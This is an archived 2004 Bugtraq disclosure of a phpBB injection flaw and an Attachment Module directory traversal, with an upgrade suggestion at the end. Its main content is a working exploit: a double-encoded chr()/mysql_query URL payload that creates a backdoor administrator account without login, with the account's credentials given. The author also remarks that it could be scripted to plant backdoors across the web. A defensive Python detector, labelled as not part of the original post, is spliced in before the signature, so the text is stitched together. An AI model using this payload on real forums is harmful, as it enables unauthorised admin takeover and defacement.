Message-ID: <20041126192351.30351.qmail@webmail.aruba.it>
Date: Fri, 26 Nov 2004 20:23:51 +0100
From: zee@...bnc.it
To: bugtraq@...urityfocus.com
Subject: Phpbb id: 10701 update and Attachmodule add-on Directory Traversal


phpBB: all versions vulnerable except 2.0.11
Attachment module: all versions vulnerable

Howdark's update opened my eyes wide with his nice exploit:

Bugtraq id: 10701 

 -----
viewtopic.php?t=1&highlight=%2527
 ----- 

Looking at the code, I saw that it was possible to inject any kind of SQL query
using multiple char() functions.

The following code adds a username with admin rights by executing this
query:

INSERT INTO 
phpbb_users(user_id,user_active,username,user_password,user_level) VALUES 
('99999','1','ze3lock','ba3c83348bddf7b368b478ac06d3340e','1') 

A new user with admin rights is then added to phpbb_users.

*Note: a working query can only be executed if the table names are known;
if they are not, it fails. So this only works on a standard installation
(usually 95% of websites ;-)

username: ze3lock
pass: thepass 

The exploit can be run without being logged in, after which you can log in
with that username. So it would be quite simple to make it part of a script
that plants backdoors around the web.

To make it work, just use the id of an existing thread (in this case the
thread is 30, as you can see from the message).

 --- Code start ---- 

http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr 
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32) 
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25 
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252 
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25 
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2 
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2 
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)% 
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)% 
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)% 
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44) 
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108 
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32 
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25 
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech 
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39 
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108) 
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2 
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec 
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr 
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98 
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25 
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec 
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr( 
41))%252e%2527 

 --- code end --- 

 ------------ Attach Module ---------------- 


In the attach module, I found a directory traversal in the "UPLOAD_DIR" 
field. 

This is the directory where all attachments are supposed to be uploaded.

The field accepts any kind of character, so instead of 'files' you can enter
'../../' and all attachments will be uploaded to the '../../' directory.

That is a real defacement risk.


 --------------- Suggestion ------------------ 

Please upgrade to version 2.0.11 and add input validation to the UPLOAD_DIR
field in the attach module.
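As an added defender's example (not part of the original post or of phpBB), the Python below mirrors the double URL-decoding that lets %2527 reach the application as a single quote, flags viewtopic.php requests in constructed access-log lines whose decoded highlight value carries quote or call characters, and shows the kind of UPLOAD_DIR validation the suggestion above asks for. The log lines, the token list and the accepted path characters are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote
from posixpath import normpath

# Constructed Apache-style access log lines (not taken from the original post).
LOG_LINES = [
    '10.0.0.5 - - [26/Nov/2004:20:23:51 +0100] "GET /forum/viewtopic.php?t=30&highlight=phpbb HTTP/1.1" 200 5120',
    '10.0.0.9 - - [26/Nov/2004:20:24:02 +0100] "GET /forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78))%252e%2527 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [26/Nov/2004:20:24:10 +0100] "GET /forum/viewtopic.php?t=1&highlight=%2527 HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Tokens that have no business in a plain list of words to highlight (assumed list).
SUSPICIOUS = ("'", '"', "(", "mysql_query")

def decode_highlight(url):
    """Return the highlight value decoded twice: once as the web server does,
    once more as the vulnerable application did, so %2527 -> %27 -> '."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = qs.get("highlight", [""])[0]   # parse_qs already decoded once
    return unquote(raw)                  # the application's second decode

def flag_highlight_abuse(lines):
    """Return (client_ip, decoded_highlight) for every viewtopic.php request
    whose fully decoded highlight value contains a suspicious token."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m or "viewtopic.php" not in m.group(1):
            continue
        decoded = decode_highlight(m.group(1))
        if any(tok in decoded for tok in SUSPICIOUS):
            hits.append((line.split()[0], decoded))
    return hits

def is_safe_upload_dir(value):
    """Accept only a relative path that stays below the forum root: no absolute
    path, no NUL byte, no traversal after normalisation, only [A-Za-z0-9_/-]."""
    if not value or "\0" in value or value.startswith("/"):
        return False
    norm = normpath(value)
    if norm == "." or norm.startswith("..") or "/.." in norm:
        return False
    return re.fullmatch(r"[A-Za-z0-9_\-/]+", norm) is not None
```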

Zeelock 


